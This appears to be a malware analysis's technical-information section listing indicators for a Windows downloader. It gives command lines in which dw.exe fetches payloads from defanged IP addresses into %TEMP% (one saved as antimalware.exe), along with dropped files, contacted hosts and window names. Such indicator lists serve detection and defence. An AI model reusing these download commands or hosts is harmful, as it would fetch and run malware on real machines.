Technical Information
- '%TEMP%\dw.exe' http://11#.#0.103.253/Main/ishosting.gif ""%TEMP%\antimalware.exe""
- '%TEMP%\antimalware.exe'
- '%TEMP%\loadzinho.exe'
- '%TEMP%\dw.exe' http://20#.#4.172.28/cirus.php %USERNAME%.tmp
- '%TEMP%\antimalware.exe' (downloaded from the Internet)
- %TEMP%\%USERNAME%2.dll
- %TEMP%\%USERNAME%.tmp
- %TEMP%\antimalware.exe
- %TEMP%\zurique.dat
- %TEMP%\loadzinho.exe
- %TEMP%\dw.exe
- %TEMP%\2820ULP4.bat
- %TEMP%\2820ULP4.bat
- %TEMP%\2820ULP4.bat
- '11#.#0.103.253':80
- '20#.#4.172.28':80
- 11#.#0.103.253/Main/ishosting.gif
- 20#.#4.172.28/cirus.php
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'